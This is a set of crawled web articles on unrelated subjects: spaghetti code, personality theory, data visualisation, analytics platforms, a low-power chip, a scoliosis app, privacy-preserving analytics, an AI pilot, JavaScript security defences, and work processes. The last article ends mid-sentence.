s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00469.warc.gz
en
0.949318
282
2.578125
3
Spaghetti code is not an endearing term. It’s a word that describes a type of code that some say will cause your technology infrastructure to fail. Despite the warnings about spaghetti code, many enterprise businesses are faced with issues that involve the set of processes and errors that make up spaghetti coding. This occurs for a number of reasons but can be detrimental to your overall infrastructure, most experts believe. In this article, we’ll talk about spaghetti code as a concept and what it means for your organization. What is Spaghetti Code? Spaghetti code is a pejorative piece of information technology jargon that is caused by factors like unclear project scope of work, lack of experience and planning, an inability to conform a project to programming style rules, and a number of other seemingly small errors that build up and cause your code to be less streamlined overtime. Typically, spaghetti code occurs when multiple developers work on a project over months or years, continuing to add and change code and software scope with optimizing existing programming infrastructure. This usually results in somewhat unplanned, convoluted coding structures that favor GOTO statements over programming constructs, resulting in a program that is not maintainable in the long-run. For businesses, creating a program only to have it become unmaintainable after years of work (and money) has gone into the project costs, IT managers, and other resources. In addition, it makes programmers feel frustrated to spend hours on coding an infrastructure only to have something break, and then they have to sift through years of work, often managed by different developers, to identify the issue, if they can solve it at all. For this reason, spaghetti code is considered a nuisance to developers and IT managers, and for enterprise businesses that have to manage their resources, it should be avoided completely. History of Spaghetti Code While it’s not clear who coined the term “spaghetti code” or when, it was being used to describe a tangled mess of code lacking structure by the late 1970s. In the 80s, the term was used at least once in a whitepaper to describe the model of code and fix that led to the development of waterfall programming. However, the vast majority of books from that era refer to it as a nest of messy code lacking the structure required to scale effectively. A 1981 coding satire raised the idea that the founders of IBM must have been fond of spaghetti code because of how they developed FORTRAN. In Richard Hamming’s book, The Art of Doing Science and Engineering: Learning to Learn, he said: “If, in fixing up an error, you wanted to insert some omitted instructions then you took the immediately preceding instruction and replaced it by a transfer to some empty space. There you put in the instruction you just wrote over, added the instructions you wanted to insert, and then followed by a transfer back to the main program. “Thus the program soon became a sequence of jumps of the control to strange places. When, as almost always happens, there were errors in the corrections you then used the same trick again, using some other available space. As a result the control path of the program through storage soon took on the appearance of a can of spaghetti. Why not simply insert them in the run of instructions? Because then you would have to go over the entire program and change all the addresses which referred to any of the moved instructions! Anything but that!” How Does it End Up in Your Infrastructure? Spaghetti programming is not clean or structured and flies in the face of scopes and models put together by enterprise businesses; so how does it get there? Spaghetti code occurs when certain conditions are met: - A programmer or programmers did not take care to finesse the architecture using programming constructs, and instead relied on easier, or less thought out approaches, or just dove into a project and started coding without a plan. - Development best practices and most streamlined coding languages change over time, so when programming evolves, existing systems should be optimized to keep them clean and structured. When this fails to occur, it creates an ecosystem of spaghetti code. - While spaghetti code can occur just hours after starting a project, in enterprise business, it often occurs over a longer period where different programmers change hands on a project. - Spaghetti code can occur when someone lacks experience and they use simpler techniques, like GOTO commands, over more refined ones that secure the structural integrity of program architecture. In general, spaghetti code is the natural result that happens to businesses when they fail to plan for a reliable architecture over the life of a project. Spaghetti Code: How to Avoid It To avoid a tangle of inefficient spaghetti code, programmers must: - Be diligent: First and foremost, diligence and attention to detail are key. A developer must be keenly focused on creating the best architecture for their project and must not rush the architecture. - Unit test often: By performing regular unit tests, you can reduce the likelihood that spaghetti code will occur. - Double-check your programmers: An extra set of eyes can help, if you come across spaghetti code, address it immediately and ask that it be changed. - Use lightweight frameworks: In 2020, there are a number of lean, lightweight frameworks you can implement. By keeping the framework streamlined, you are setting yourself up for more simplified solutions. - Implement layers: In practice, layers help you correct spaghetti code more easily by addressing a single layer instead of an entire program. Related Code Types There are a few related types of code you can review for additional learning: - Ravioli code: This is the term for errors in object-oriented code that occur when code is easy to understand in a class but not in the context of the entire project. - Lasagna code: This is a problem that can occur when you use layers to avoid spaghetti code and the layers are so interdependent on one another that a single break in a layer affects the whole project. - Pizza code: If a code architecture is too flat, it’s called a pizza code.
<urn:uuid:6290d467-040c-4dda-8917-4ba075792f71>
CC-MAIN-2022-40
https://www.bmc.com/blogs/spaghetti-code/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00469.warc.gz
en
0.941053
1,250
2.84375
3
*** Excerpt from a book*** The origin or the etymological derivative of personality comes from the word “persona”, theatrical masks worn by the Romans in Greek and Latin drama. Personality also comes from the two Latin words “per” and “sonare”, which literally means “to sound through”. This concept extends to Jung’s component of “persona”, meaning “public image”, which refers to the role expected by social or cultural convention. Definitions of personality by psychologists 1. Personality is the totality of individual psychic qualities, which includes temperament, one’s mode of reaction and character, two objects of ones reaction (Fromm, 1974) 2. Personality may be biologically defined as the governing organ or superordinate institution of the body in as much as it is located in the brain. “No brain, no personality” (Murray, 1951) 3. Personality is a person’s unique pattern of traits. (Guilford, 1959) 4. Personality is the record of a person’s experiences and behavior together with the psychological systems, which contribute casual determination to the existing and functioning record. Some casual determination is found within the record itself. (Cartwright, 1979) 5. Personality is the impression an individual makes on others. It refers to his/her social skills, charismatic qualities and the like (Hall, Calvin and Gardner, 1985) 6. Personality is generally defined as the individuals unique and relatively stable patterns of behavior, thoughts and emotion (Burger, 1990) 7. Personality is the stability in people’s behavior that leads them to act uniformly both in different situations and over extended periods of time (Felman, 1994) All the definitions above equate personality as the essence or the uniqueness of behavior. Allport’s definition of personality In 1973, Allport defined personality as “what a man really is”. This statement indicates that personality is the typical and peculiar characteristics of a person. In 1961, after 24 years, Alport modified his definition as a dynamic organization within an individual of the psycho-physical system that determines his or her characteristic behaviors and thoughts. dynamic organization – personality is constantly evolving and changing. A newborn infant lacks personality because his or her behavior keeps on changing. An infant’s personality is influenced by heredity and by the surrounding condition. Personality development begins at birth and unfolds gradually until death. psycho-physical – personality is neither exclusively mental nor exclusively neural. The organization entails the operation of both body and mind. People’s functions includes vegetative, sentient and rational functions. characteristic behaviors and thoughts – the replacement of the phrase “unique adjustments to the environment” in Allport’s original definition of personality (1937). The earlier definition seemed to emphasize too much in biological needs. His revised definition covers all behaviors and thoughts. *** This information is from a book, I don’t know the book title and the author (just copied it in my notes). If you do, feel free to send me a message so that the book title and author will be added as source. ***
<urn:uuid:9eef102a-57d9-4daf-aeba-624f826accdf>
CC-MAIN-2022-40
https://jeffric.com/personality/6/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00469.warc.gz
en
0.929266
671
3.734375
4
The late data visionary Hans Rosling mesmerised the world with his work, contributing to a more informed society. Rosling used global health data to paint a stunning picture of how our world is a better place now than it was in the past, bringing hope through data. Now more than ever, data are collected from every aspect of our lives. From social media and advertising to artificial intelligence and automated systems, understanding and parsing information have become highly valuable skills. But we often overlook the importance of knowing how to communicate data to peers and to the public in an effective, meaningful way. The first tools that come to mind in considering how to best communicate data – especially statistics – are graphs and scatter plots. These simple visuals help us understand elementary causes and consequences, trends and so on. They are invaluable and have an important role in disseminating knowledge. Data visualisation can take many other forms, just as data itself can be interpreted in many different ways. It can be used to highlight important achievements, as Bill and Melinda Gates have shown with their annual letters in which their main results and aspirations are creatively displayed. Everyone has the potential to better explore data sets and provide more thorough, yet simple, representations of facts. But how can do we do this when faced with daunting levels of complex data? Table of Contents A world of too many features We can start by breaking the data down. Any data set consists of two main elements: samples and features. The former correspond to individual elements in a group; the latter are the characteristics they share. Anyone interested in presenting information about a given data set should focus on analysing the relationship between features in that set. This is the key to understanding which factors are most affecting sales, for example, or which elements are responsible for an advertising campaign’s success. When only a few features are present, data visualisation is straightforward. For instance, the relationship between two features is best understood using a simple scatter plot or bar graph. While not that exciting, these formats can give all the information that system has to offer. Data visualisation really comes into play when we seek to analyse a large number of features simultaneously. Imagine you are at a live concert. Consciously or unconsciously, you’re simultaneously taking into account different aspects of it (stagecraft and sound quality, for instance, or melody and lyrics), to decide whether the show is good or not. This approach, which we use to categorise elements in different groups, is called a classification strategy. And while humans can unconsciously handle many different classification tasks, we might not really be conscious of the features being considered or realise which ones are the most important Now let’s say you try to rank dozens of concerts from best to worst. That’s more complex. In fact, your task is twofold, as you must first classify a show as good or bad and then put similar concerts together. Finding the most relevant features Data visualisation tools enable us to bunch different samples (in this case, concerts) into similar groups and present the differences between them. Clearly, some features are more important in deciding whether a show is good or not. You might feel an inept singer is more likely to affect concert quality than, say, poor lighting. Figuring out which features impact a given outcome is a good starting point for visualising data. Imagine that we could transpose live shows onto a huge landscape, one that is generated by the features we were previously considering (sound for instance, or lyrics). In this new terrain, great gigs are played on mountains and poor ones in valleys. We can initially translate this landscape into a two-dimensional map representing a general split between good and bad. We can then go even further and reshape that map to specify which regions are rocking in “Awesome Guitar Solo Mountain” or belong in “Cringe Valley”. From a technical standpoint, this approach is broadly called dimensionality reduction, where a given data set with too many features (dimensions) can be reduced into a map where only relevant, meaningful information is represented. While a programming background is advantageous, several accessible resources, tutorials and straightforward approaches can help you capitalise on this great tool in a short period of time. Network analysis and the pursuit of similarity Finding similarity between samples is another good starting point. Network analysis is a well-known technique that relies on establishing connections between samples (also called nodes). Strong connections between samples indicate a high level of similarity between features. Once these connections are established, the network rearranges itself so that samples with like characteristics stick together. While before we were considering only the most relevant features of each live show and using that as reference, now all features are assessed simultaneously – similarity is more broadly defined. The amount of information that can be visualised with networks is akin to dimensionality reduction, but the feature assessment aspect is now different. Whereas previously samples would be grouped based on a few specific marking features, in this tool samples that share many features stick together. That leaves it up to users to choose their approach based on their goals. Venturing into network analysis is easier than undertaking dimensionality reduction, since usually a high level of programming skills is not required. Widely available user-friendly software and tutorials allow people new to data visualisation to explore several aspects of network science. The world of data visualisation is vast and it goes way beyond what has been introduced here, but those who actually reap its benefits, garnering new insights and becoming agents of positive and efficient change, are few. In an age of overwhelming information, knowing how to communicate data can make a difference – and it can help keep data’s relevance in check. Like this article? Subscribe to our weekly newsletter to never miss out!
<urn:uuid:6e409e34-d50a-437e-be70-9d1168cd7ab7>
CC-MAIN-2022-40
https://dataconomy.com/2017/05/data-visualisation-features/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00469.warc.gz
en
0.952882
1,184
3.421875
3
What is Self-Service? The Gartner definition of self-service is “a form of business intelligence (BI) in which line-of-business professionals are enabled and encouraged to perform queries and generate reports on their own, with nominal IT support”. Other definitions offer up the idea that self-service is the platform that allows business users to utilize data to spot business opportunities, without requiring them to have a background in statistics or technology. This approach allows business users to make data-driven decisions in real time without having to rely on information technology (IT) staff or data scientists to create reports. The problem with this is of course that consumers of self-service platforms are far more diverse than the providers of that capability. The personas amongst those who utilize self-service platforms include business analysts, hard-core programmers, data scientists, and business executives. Self-service means something different to each persona, and many are diametrically opposed to the other. For the business analyst, self-service means being able to mash data and a SQL-like language into an intuitive set of steps to deliver insights. For the programmer, it means providing the ability to create their own scripts in their language of choice. For the data scientist, it means being able to intelligently mix and match state of the art algorithms to understand underlying data patterns. For executives, it means interactively working with a few dashboards to fully understand the state of their business. Under these circumstances, how would a provider-centric self-service platform work? It wouldn’t! Simply put there are at least eight items that need to be considered by the purveyors of an analytic platform when providing self-service capabilities. What Self-Service Analytics Platforms Should Include Simply put there are at least eight items that need to be considered by the purveyors of an analytic platform when providing self-service capabilities. Each of these topics can be explored further, however, when integrated thoughtfully into an analytics platform they are able cater to the widest net of analytic professionals. More importantly, our quest for driving business outcomes in a self-service manner becomes a bit more perfect. The capabilities are: Analytics is a team sport. Never in our hands-on careers have we seen an analyst doing all their work and that’s the end of their story. Typically, when analysts work alone, the things they are working on can be called science experiments. True collaboration comes when the analytic environment is structured in a manner where all participants speak in a common language with one another. Data catalogs provide a cross-organizational view of all the data sources and objects within those sources with a clear marking of definitions and hierarchies. A crisp catalog now makes it easy for analysts to pick and choose their variables that they use in analytics. Security and Governance: In this day and age, what is the use of a data-driven practice that does not guarantee security? Especially in the context of collaboration, security becomes important to the business. We are not just referring to access privileges that are applied across the board, but instead a persona-based sensible application of rules that ensure data fidelity, confidentiality, as well as context-based access. Pre-built analytic functions across multiple genres (e.g., machine learning, sentiment analysis, graph, statistics) make it easier for the citizen data scientists to quickly invoke functions in a nested manner to render insights. The alternative is to code these in a non-repeatable manner, therefore wasting time and resources. Integrated BI Tools:Not all solutions have their own built in BI tools. However, when an analytics platform integrates well with a BI tool it makes it easier for users to quickly deliver compelling visualizations and dashboards that, in turn, make the operationalization of business insights a given. Analytic workflow tools, such as KNIME, include a graphical interface that enables users to create data flows, execute selected analysis steps, and review the results, models and interactive views. This, again, caters to a group of analytic personas that want the rigor of analysis without having to deal with the unstructured scripting environments that others may prefer. Gone are the days where one data source claims to speak to some existential truth. Nowadays, we connect to many enterprise data warehouses, data lakes, cloud data pods, flat files, and unstructured data repositories, to name a few. To do analytics separately in each of these siloed systems and then attempt to piece together the outcomes is a disaster of apocalyptic proportions (I’m only slightly exaggerating). What we need is to have the ability to connect to various sources at will so that we can complement analytics with all data that the business needs and generates. Flexible UX/UI Design:Underpinning a strong focus on self-service analytics is an absolute focus on usability and experience. A design that is customized based on user personas exponentially increases analytics adoption. Adoption that is instead focused on simply giving anyone access to the platform without regard to their skills and aptitudes is likely to fail. In the worst-case scenario, a bad user experience turns off the entire organization from a path of intelligent decision making.
<urn:uuid:871498a5-2b82-4537-9f1b-5a63525db325>
CC-MAIN-2022-40
https://www.teradata.com.cn/Blogs/The-Eight-Functions-You-Should-Consider-When-Choosing-a-Self-Service-Analytics-Platform
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00469.warc.gz
en
0.944237
1,111
2.65625
3
A partnership between Texas Instruments and the Massachusetts Institute of Technology has produced a proof-of-concept microchip architecture that is 10 times more efficient than current technologies. The design — which was presented on Tuesday at the International Solid State Circuits Conference — uses a redesigned memory and logic architecture to allow the chip to operate at a much lower voltage level, which allows devices such as cell phones to operate with a longer battery life. While consumers likely won’t see any new devices for at least five years, researchers say the chip could help build long-lasting cell phones and implantable medical devices that use body heat to power its systems. The research, funded in part by the U.S. Defense Advanced Research Projects Agency (DARPA), could also lead to the development of military sensor networks that are scattered across the battlefield. “These design techniques show great potential for TI future low-power IC (integrated circuit) products and applications including wireless terminals, RFID, battery-operated instrumentation, sensor networks, medical electronics and many others,” said Dennis Buss, chief scientist at Texas Instruments. How the Chip Was Done The chip’s development required the researchers to re-imagine how the circuits on the microchip were powered. That was no simple task considering that microchip architecture was designed to work at one volt, while the new chip is powered at 0.3 volts. To accomplish that, the designers built a DC-to-DC converter directly on the chip, then integrated the memory and logic systems with the converter. The end result will be a more efficiently powered microchip, which — if the design can be cheaply manufactured — leapfrogs several generations of innovation, said Gideon Intrater, vice president of solutions architecture for Mountain View, Calif.-based MIPS Technologies, a semiconductor design firm. “In the past, with each transition from one process generation to the next, power consumption was reduced by a factor of about three times,” Intrater told TechNewsWorld. “These process transitions occurred roughly every two to three years.” The new microchip is still in the design phase, so it’s difficult to predict the types of devices that might hit the market in the near future; however, the chip would have the capability of extending the current battery life of devices already on the market. The increased power, though, would also likely lead to smaller — and more powerful — devices that could run longer and more efficiently between charges. “It is clear that any battery-operated device could benefit from the longer battery life and smaller battery size,” Intrater said. “These products could include traditional mobile consumer devices like cell phones, PDAs and media players, as well as medical devices.”
<urn:uuid:46d0c07e-75ec-4463-8dcb-b392380bed7c>
CC-MAIN-2022-40
https://www.ecommercetimes.com/story/new-chip-uses-10-times-less-power-61554.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334802.16/warc/CC-MAIN-20220926051040-20220926081040-00669.warc.gz
en
0.962689
579
3.171875
3
Parents can now check their child’s spine for possible signs of scoliosis with the new app SpineScreen developed by Shriners Hospitals for Children. Available for free on the App Store and Google Play, SpineScreen detects curves as the cell phone is moved along a child’s back, giving parents a quick, informal way to regularly monitor their child’s spine. Scoliosis is an abnormal curvature of the spine that can restrict movement and in some cases lead to other serious medical conditions. It is most commonly diagnosed between 10 and 15 years of age, when children grow rapidly. Some cases, however, can go undetected. At this point in a child’s life, fewer vaccinations are required, so they may see a doctor less often. Since early detection is crucial, Shriners Hospitals physicians encourage parents to download the free SpineScreen app and check kids as part of their back-to-school routine each year. “Because there is often no known cause, monitoring for scoliosis is an important part of a child’s ongoing health care,” says Amer Samdani, M.D., chief of surgery for Shriners Hospitals for Children — Philadelphia. He adds, “It is a progressive condition, so early detection is key. At Shriners Hospitals, our care ranges from routine monitoring to some of the most advanced treatments for scoliosis. The earlier we see a child, the more options we have available.” Shriners Hospitals created the app as part of a broader initiative to highlight the importance of regular screenings and to educate parents on the signs of scoliosis and treatment options. “With doctors and staff who are global leaders in the treatment of scoliosis care, parents turn to Shriners Hospitals for Children because they know their children will receive the best care possible,” Gary Bergenske, chairman of the Board of Directors for Shriners Hospitals for Children. “Since scoliosis usually requires ongoing medical treatment throughout childhood, our commitment to provide care regardless of the families’ ability to pay is a huge relief to parents.”
<urn:uuid:14ebf9da-a882-48ba-8bad-e2bad1d36811>
CC-MAIN-2022-40
https://www.e-channelnews.com/new-spinescreen-app-helps-parents-detect-signs-of-scoliosis-in-kids/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335286.15/warc/CC-MAIN-20220928212030-20220929002030-00669.warc.gz
en
0.949772
451
2.734375
3
A large number of commercial services are nowadays using personal data of their users, such as their location, purchase transactions, payment transactions, social security numbers, activity data, authentication data, social interactions, browsing history, and more. These data are commonly used to deliver personalized applications in a variety of application sectors, including retail, finance, healthcare and social media. Nevertheless, the extensive collection and use of personal data raises important privacy and data protection concerns. For instance, consumers are interested in preventing the use of their data for purposes other than the ones specified in the data collection process. Likewise, they would like to have fine grained control over their data through controlling when and with whom to share data. Citizens and businesses are in several cases reluctant to share their data as means of mitigating the above risks. This leads to “data silos” i.e. data analytics processes and data intensive applications that are addressed to the data producers only and which do not provide opportunities for repurposing and reusing data across different applications. Much as this reluctance is a privacy protection measure, it is also a set-back to innovation. The breaking of the data silos and the ability to reuse datasets across data-intensive applications could unveil significant opportunities for innovative applications. As a prominent example, by combining data from different financial organizations, it is possible to create more accurate user profile for highly personalized applications. As another example, the integration of healthcare data that are collected by different people, devices and applications can facilitate the extraction of medical knowledge, thus opening new horizons to clinical research and observational studies. Therefore, it’s important to lower the data sharing barriers, through alleviating risks and offering data providers with incentives to share their data beyond a single application. One of the best ways to provide incentives for data sharing is to create a data market as a tool for connecting the demand (i.e. data buyers) with the supply side (i.e. data providers) based on secure and trustworthy data exchange mechanisms. In the scope of a data market, multiple providers are willing to share their data in exchange of some monetary or other incentive. At the same time, data buyers have the opportunity of accessing data from multiple providers at a specified cost. There are also technological measures that can encourage and facilitate data exchange, notably measures based on privacy enhancing and privacy awareness mechanisms. The latter aim at safeguarding the privacy of data providers at all times. One of the most prominent privacy enhancing mechanisms for data intensive applications, concerns the employment of privacy preserving analytics techniques. Privacy preserving analytics schemes aim at analyzing data from a source, without disclosing information about it and in a way that minimizes the risk of presenting the source’s data to malicious parties (e.g., enterprises that would like to exploit users’ personal data). In essence, privacy preserving analytics techniques enable application developers to analyze vast amounts of personal data, without however compromising the source data. In practice, this means that application developers and end users can see the outcomes of the analysis (e.g., the answers and results of a query) without disclosing information about the source data where this query was executed. When querying or analyzing data from a single source, there is a straightforward way for safeguarding the privacy of the source: Moving the query to the data source, rather than moving the data to the analytics through the network. As soon as the data remain at the system of the data provider, they can be secure and private. Nevertheless, the tactic of moving the query to the data source cannot work in cases where data from multiple data providers need to be processed, which is a common and useful scenario in the scope of a data market. In such cases some data have to be moved outside the organization of the data provider, which makes them susceptible to eavesdropping and other forms of hacking. In order to alleviate relevant privacy concerns, the data that are moved out of the organization can be encrypted. Furthermore, secure computing techniques can be employed in order to enable execution of queries on data that remain encrypted at all times. Secure computation solutions provide a means to query data without ever decrypting them, which offers a solution for cases where data owners lose control of the data analytics process, typically when their data needs to be processed outside their organization. In particular, based on secure computation data analyzers can obtain answers to a query, without decrypting source data, which permits data owners to retain control of their data at all times. Secure computing schemes are based on advanced mathematical and cryptographic formulations such as: These secure computing schemes have been known to the research community for several decades. However, their practical applicability in real life applications beyond research prototypes has been quite limited, mainly due to the poor performance of the corresponding implementations. This situation has changed during recent years, where the maturity and performance of secure computing frameworks have been improved. This is clearly reflected in the emergence of start-up enterprises that offer cryptographic products and privacy preserving services based on secure computing techniques. As a prominent example, Unbound (MPC) applies secure computing in order to ensure that secrets such as cryptographic keys, credentials and private data are never processed in complete form. Likewise, Sepior leverages secure computing techniques to provide threshold key management solutions for blockchain, cryptocurrencies, and cloud services providers infrastructures. There have also been remarkable academic projects on secure computing, such as MIT’s Enigma project that offers a decentralized platform for secure computing based on blockchain technology. Beyond research efforts and start-ups, secure computing is nowadays integrated with several products of large IT providers. The practical applicability of secure computing is largely due to the emergence of specialized high performance hardware. Nevertheless, practical deployments remain challenging for performance reasons. According to some benchmarks, homographic encryption is still million times slower than traditional computations, which is the reason why secure computing techniques leverage specialized hardware mechanisms in modern CPUs like Intel’s Secure Guard Extensions (SGX). In the coming years, we expect to see rising needs for privacy preserving processing of datasets, as part of the wave of BigData and Artificial Intelligence (AI) applications. Assuring end-users that their data remain encrypted at all times can lower the barriers of data sharing, while relaxing relevant privacy concerns. Secure computing can provide a great technical contribution in this forefront, especially as evolution in hardware and computing make it a viable alternative for privacy preserving analytics. The emerging role of Autonomic Systems for Advanced IT Service Management How to Create an Inclusive Conversational UI Achieving Operational Excellence through Digital Transformation Keeping ML models on track with greater safety and predictability How education technology enables a bright future for learning Significance of Customer Involvement in Agile Methodology Quantum Computing for Business – Hype or Opportunity? Why is Data Fabric gaining traction in Enterprise Data Management? How Metaverse could change the business landscape We're here to help! No obligation quotes in 48 hours. Teams setup within 2 weeks. If you are a Service Provider looking to register, please fill out this Information Request and someone will get in touch. Outsource with Confidence to high quality Service Providers. If you are a Service Provider looking to register, please fill out this Information Request and someone will get in Enter your email id and we'll send a link to reset your password to the address we have for your account. The IT Exchange service provider network is exclusive and by-invite. There is no cost to get on-board; if you are competent in your areas of focus, then you are welcome. As a part of this exclusive
<urn:uuid:9caaefe9-15bc-416a-ae03-6cb6b06cf7d5>
CC-MAIN-2022-40
https://www.itexchangeweb.com/blog/enabling-ai-on-personal-data-with-privacy-preserving-analytics/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335286.15/warc/CC-MAIN-20220928212030-20220929002030-00669.warc.gz
en
0.926986
1,558
2.578125
3
A team of researchers at Carnegie Mellon University believe they have developed the first AI pilot that enables autonomous aircraft to navigate crowded airspace. AI pilot could eventually pass the Turing Test Artificial intelligence can safely avoid collisions, predict the intent of other aircraft, track aircraft and coordinate with their actions, and communicate over the radio with pilots and air traffic controllers. The researchers aim to develop the AI so the behaviors of their system will be indistinguishable from those of a human pilot. Jean Oh, an associate research professor at CMU’s Robotics Institute (RI) and a part of the AI pilot team, stated, “We believe we could eventually pass the Turing Test,” alluding to the test of an AI’s capacity to demonstrate intelligent behavior comparable to a human. The AI employs both vision and natural language to convey its intent with other aircraft, whether flown or not, to engage with them as a human pilot would. To navigate safely and under social norms, adopt this conduct. Researchers trained the AI on data gathered at the Allegheny County Airport and the Pittsburgh-Butler Regional Airport, which included air traffic patterns, photographs of planes, and radio broadcasts, to achieve this implicit coordination. Similar to a human pilot, the AI employs six cameras and a computer vision system to identify surrounding planes. Its automatic voice recognition feature uses NLP methods to comprehend incoming radio transmissions and speak verbally with pilots and air traffic controllers. The development of autonomous aircraft will increase the possibilities for drones, air taxis, helicopters, and other aircraft to operate, often without a pilot at the controls, moving people and goods, inspecting infrastructure, treating fields to protect crops, and monitoring for poaching or deforestation. However, the area where these aircraft must fly is already congested with small aircraft, medical helicopters, and other aircraft. The FAA and NASA have suggested segmenting this urban airspace into lanes or corridors with limitations on the times, types, and numbers of aircraft permitted to use them. This could lead to air traffic bottlenecks prohibiting essential aircraft, such as medical evacuation helicopters, from reaching their destinations. It would fundamentally alter how this airspace is now used and generally operated. The aerospace industry has faced challenges in developing an AI to handle the frequently congested and pilot-controlled lower-altitude traffic operating under visual flight rules (VFR), even though autopilot controls are common among commercial airliners and other aircraft operating in higher altitudes under instrument flight rules (IFR). The AI used by the team is built to interact with airplanes in VFR airspace with ease. “This is the first AI pilot that works in the current airspace. I don’t see that airspace changing for UAVs. The UAVs will have to change for the airspace,” explained Sebastian Scherer, an associate research professor in the RI and a member of the team. The AI pilot has done well in flight simulators, but the company has not yet tested it on actual planes. The team sets up two flight simulators to evaluate the AI. The AI controls one, while a person is in charge of the other. They both use the same airspace. Even if the pilot at the controls lacks experience, the AI can safely maneuver around the controlled aircraft. Commercially, AI could assist autonomous aircraft in carrying passengers and delivering products. To reduce weight and protect themselves against a pilot shortage, delivery drones and air taxis would ideally not fly with a pilot on board. The project’s lead researcher, Jay Patrikar, a Ph.D. candidate at the RI, stated, “We need more pilots, and AI can help.”
<urn:uuid:c06a1684-ebee-426f-8826-173adc006052>
CC-MAIN-2022-40
https://dataconomy.com/2022/08/ai-pilot-could-navigate-crowded-airspace/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00669.warc.gz
en
0.939332
744
3.453125
3
Source Code Vulnerabilities Unintended Script Execution Exclusive Reliance on Client-Side Validation Most organizations only ensure validation on users’ browsers. Though this offers a certain level of security, hackers who use advanced techniques to send unverified data to servers can corrupt records and configurations. Exposure of Session Data Attackers leverage the power of client-side browser scripts to access all communication between the browser and the web application. This communication may include sensitive session data, such as user session IDs used for unauthorized access. Unintentional User Activity These vulnerabilities include: - Filtering & sanitizing user input - Using effective response headers - Encode data before output generation - Utilize Content Security Policies - Using regularly an XSS Scanner before every release Cross-Site Request Forgery (CSRF or XSRF) CSRF is a widespread security vulnerability in which threat actors manipulate legitimate users into submitting malicious requests to web applications they are ambushed to visit. When the web application fails to differentiate between valid user requests and forged requests, attackers can execute any malicious actions under the guise of legitimate end-users. CSRF attacks can be prevented by: - Implementing secure random tokens - Logging off unused web applications - Disallowing automatic password entries by browsers - Securing session credentials - Using regularly a CSRF Scanner before every release This mechanism injects and executes malicious or arbitrary code on a web application’s server without sanitized and filtered user inputs. Attackers typically look for functions that parse user-generated data without proper validations to ingest insecure scripts to be executed by the server. Server-side injection attacks are typically prevented by properly validating and filtering user inputs. Client-Side Logic Attacks Client-Side Logic attacks can be prevented by avoiding operations with sensitive security controls on the client side. Avoid Evaluating User Input – The eval() and new Function () command executes arguments passed in user inputs as JS expressions. As hackers manipulate user input to run malicious scripts, it is recommended to avoid evaluating user inputs or parse JSON data through the above constructors. Enable TLS/SSL Encryption – Encrypting data exchanged between servers and clients helps prevent CSRF and XSS attacks. Secure API Access – It is essential to assign tokens for each user accessing the web app through the API, enabling secure access. Setting Secure Cookies – By setting cookies as secure, each cookie can only be used for a single web page, ensuring encrypted access. Defining Content Security Policies – Content security policies ensure that attackers don’t inject malicious scripts into web applications to manipulate state changes. Also, hire security professionals or embed continuous security by employing a security scanner and generating a vulnerability report before pushing new production changes. You can read about DevSepOps and SecDevOps in our individual blog posts (and yes, they are different things). The Zed Attack Proxy (ZAP) is an open-source web application security scanner part of the OWASP project. The tool uses a combination of AJAX Spidering and Fuzzing to expose potential vulnerabilities by sending the application into an undesired state. ZAP encapsulates most AppSec features in a single, open-source, and easy-to-use platform that enables manual and automated security scans. The Crashtest Security Suite is trusted by many software vendors and organizations globally to deploy safer web applications through vulnerability scanning and assessment. Start your 14-day trial with the suite to explore how Crashtest Security can help improve developer productivity and reduce security testing budgets.
<urn:uuid:de84b8b6-35b5-47e9-94b0-137aaf793ba0>
CC-MAIN-2022-40
https://crashtest-security.com/javascript-vulnerabilities/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00669.warc.gz
en
0.878819
1,923
2.96875
3
With every piece of new work or indeed any new experience we undertake in our lives we go through a process of learning. We may watch the task, repeat the task, read about the task – there are many different ways of learning how to do something and a thousand scholarly scientific textbooks that will tell you all about it. But why is this relevant to process? The answer is simple – the benefits of process are fundamentally based on the way humans learn. In a former life I was a commis chef. One day I was given a task to make the tomato concasse for one of the dishes. The chef showed me how to do it and I repeated it after him. “Good” said the Head Chef, and proceeded to give me a bucket of tomatoes to turn into concasse. So I started to make the concasse – I took the first tomato, chopped it in two, scooped out the seeds, pressed it flat, chopped the middle out and pressed it flat then diced the tomato. Half an hour later I felt the burning eye of the chef looking at my paltry pile of tomato concasse. “NO, NO, NO!” he said and proceeded to show me the error of my ways. “First chop all the tomatoes, then scoop out all the seeds, then press them all flat, then dice them ALL!” I didn’t realise it at the time but this was my first real-life lesson in the benefits of process. As I did each step in turn I found myself speeding up dramatically. The first few I did were slow as I got my technique right, but after that I was flying, and in no time I was finished my bucket of tomatoes and was feeling very pleased with myself (until I was given a bucket of potatoes!) What I had replicated was the concept of functional design – the same concept that was the basis of the industrial revolution. If I had, for example, a tomato concasse factory I would probably have a team that would put the tomatoes into buckets, another team to chop the tomatoes, another team to flatten the tomatoes, etc. When we split tasks into functions we break them down into simpler more easily understood parts.As they are simpler to understand the learning curve is shorter; workers can learn to do each task quickly and become very fast at doing the tasks whilst maintaining quality. Conversely if we have multiple tasks performed by one person the complexity of learning becomes greater and it is slower to complete the overall process – we introduce multiple learning curves within the process. I would also argue that when each learning curve is repeated simultaneously there is greater memory retention than when multiple learning curves exist. Back in 1776 a very canny Scotsman, Adam Smith talked about this exact phenomenon in his famous book, “The Wealth of Nations“. He talked about what he defined as the “Division of Labour” – what we call functions today – and he used the example of the making of metal pins to demonstrate the benefits of the division of labour: “Each person, therefore, making a tenth part of forty-eight thousand pins, might be considered as making four thousand eight hundred pins in a day. But if they had all wrought separately and independently, and without any of them having been educated to this 